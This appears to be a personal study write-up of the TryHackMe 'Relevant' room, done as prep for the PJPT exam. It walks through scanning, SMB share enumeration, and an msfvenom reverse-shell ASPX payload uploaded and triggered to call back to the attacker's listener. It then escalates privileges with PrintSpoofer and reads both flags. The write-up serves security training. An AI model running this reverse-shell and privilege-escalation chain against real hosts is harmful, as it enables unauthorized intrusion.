Hi, everyone. As I prepare for the PJPT, I've been doing my best to write clear and concise notes that are easy to follow. This is important in case you have to reset your or the victim's machine. In my case, I've been experiencing a few crashes, one of which happened while I was working on THM's Relevant Box. Luckily, I was taking notes, and it only took me 3 minutes to get back in after the machine was back up and running. So here's what my standard notes look like while running through this room:
Relevant
1. Rustscan
root@ip-10-10-180-97:~# rustscan -g -a 10.10.66.86 -u 5000 10.10.66.86 -> [80,135,139,445,3389,5985,49663,49666,49667]
2. NMAP Scan
root@ip-10-10-180-97:~# nmap -sVC -p 80,135,139,445,3389,5985,49663,49666,49667 10.10.66.86 Starting Nmap 7.60 ( https://nmap.org ) at 2024-03-11 12:46 GMT Nmap scan report for ip-10-10-66-86.eu-west-1.compute.internal (10.10.66.86) Host is up (0.00043s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=Relevant | Not valid before: 2024-03-10T12:40:11 |_Not valid after: 2024-09-09T12:40:11 |_ssl-date: 2024-03-11T12:47:55+00:00; +1s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49663/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC MAC Address: 02:CA:17:A3:3B:49 (Unknown) Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_nbstat: NetBIOS name: RELEVANT, NetBIOS user: <unknown>, NetBIOS MAC: 02:ca:17:a3:3b:49 (unknown) | smb-os-discovery: | OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3) | Computer name: Relevant | NetBIOS computer name: RELEVANT\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2024-03-11T05:47:55-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2024-03-11 12:47:56 |_ start_date: 2024-03-11 12:40:12 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 95.99 seconds
3. SMB Enumeration
root@ip-10-10-180-97:~# smbclient -L \\\\10.10.66.86 WARNING: The "syslog" option is deprecated Enter WORKGROUP\root's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC nt4wrksv Disk root@ip-10-10-180-97:~# smbclient \\\\10.10.66.86\\nt4wrksv WARNING: The "syslog" option is deprecated Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Jul 25 22:46:04 2020 .. D 0 Sat Jul 25 22:46:04 2020 passwords.txt A 98 Sat Jul 25 16:15:33 2020 7735807 blocks of size 4096. 4949412 blocks available smb: \> get passwords.txt getting file \passwords.txt of size 98 as passwords.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec) smb: \> put test.txt putting file test.txt as \test.txt (0.7 kb/s) (average 0.7 kb/s)
We can place files on the host via SMB
4. WebApp Enumeration
root@ip-10-10-180-97:~# gobuster dir -u http://10.10.66.86:49663 -w /usr/share/wordlists/dirb/big.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.66.86:49663 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2024/03/11 12:56:08 Starting gobuster =============================================================== /aspnet_client (Status: 301) =============================================================== 2024/03/11 12:58:27 Finished ===============================================================
Went to http://10.10.66.86:49663/nt4wrksv and later http://10.10.66.86:49663/nt4wrksv/passwords.txt
It Works => This is the same directory as the share we accessed earlier. We can upload a webshell to the share and detonate it via this website.
5. Creating a payload & Starting Listener
root@ip-10-10-180-97:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.180.97 LPORT=8080 -f aspx > shell.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of aspx file: 2717 bytes smb: \> put shell.aspx putting file shell.aspx as \shell.aspx (8.4 kb/s) (average 7.9 kb/s) root@ip-10-10-180-97:~# nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080)
6. Detonated but Nothing Happened…
After research the arch was the reason. msfvemon defaults to x86 but the webserver is x64.
root@ip-10-10-180-97:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.180.97 LPORT=8080 -f aspx > shell2.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of aspx file: 3387 bytes smb: \> put shell2.aspx putting file shell.aspx as \shell.aspx (8.4 kb/s) (average 7.9 kb/s)
7. Round 2
root@ip-10-10-180-97:~# curl http://10.10.66.86:49663/nt4wrksv/shell3.aspx Listening on [0.0.0.0] (family 0, port 8080) Connection from ip-10-10-66-86.eu-west-1.compute.internal 49883 received! Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv> => I'm in
8. Find User Flag
C:\Users\Bob\Desktop>type user.txt type user.txt THM{fdk4ka34vk346ksxfr21tg789ktf45}
9. Windows PrivEsc
C:\Users>whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeImpersonatePrivilege looks interesting
10. Box crashed… Rebooting
Connection from ip-10-10-134-96.eu-west-1.compute.internal 49689 received! Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv> => I'm back
11. PrinterSpoofer for SeImpersonation (PrivEsc)
root@ip-10-10-180-97:~# wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe Saving to: \u2018PrintSpoofer64.exe\u2019 PrintSpoofer64.exe 100%[=======================>] 26.50K --.-KB/s in 0.001s 2024-03-11 13:50:53 (21.9 MB/s) - \u2018PrintSpoofer64.exe\u2019 saved [27136/27136] smb: \> put PrintSpoofer64.exe putting file PrintSpoofer64.exe as \PrintSpoofer64.exe (13249.4 kb/s) (average 7451.9 kb/s) cd c:/inetpub/wwwroot/nt4wrksv
12. Execute PrintSpoofer
Share file path ⇒ c:/inetpub/wwwroot/
c:\windows\system32\inetsrv>cd c:/inetpub/wwwroot/nt4wrksv c:\inetpub\wwwroot\nt4wrksv>dir dir Volume in drive C has no label. Volume Serial Number is AC3C-5CB5 Directory of c:\inetpub\wwwroot\nt4wrksv 03/11/2024 06:51 AM <DIR> . 03/11/2024 06:51 AM <DIR> .. 07/25/2020 08:15 AM 98 passwords.txt 03/11/2024 06:51 AM 27,136 PrintSpoofer64.exe 03/11/2024 06:48 AM 3,387 shell3.aspx 3 File(s) 30,621 bytes 2 Dir(s) 20,272,066,560 bytes free c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -i -c powershell.exe PrintSpoofer64.exe -i -c powershell.exe [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights reserved. PS C:\Windows\system32>
13. Find Root Flag
PS C:\Windows\system32> whoami whoami nt authority\system PS C:\Windows\system32> cd C:\Users\Administrator\Desktop cd C:\Users\Administrator\Desktop PS C:\Users\Administrator\Desktop> ls ls Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 7/25/2020 8:25 AM 35 root.txt PS C:\Users\Administrator\Desktop> type root.txt type root.txt THM{1fk5kf469devly1gl320zafgl345pv}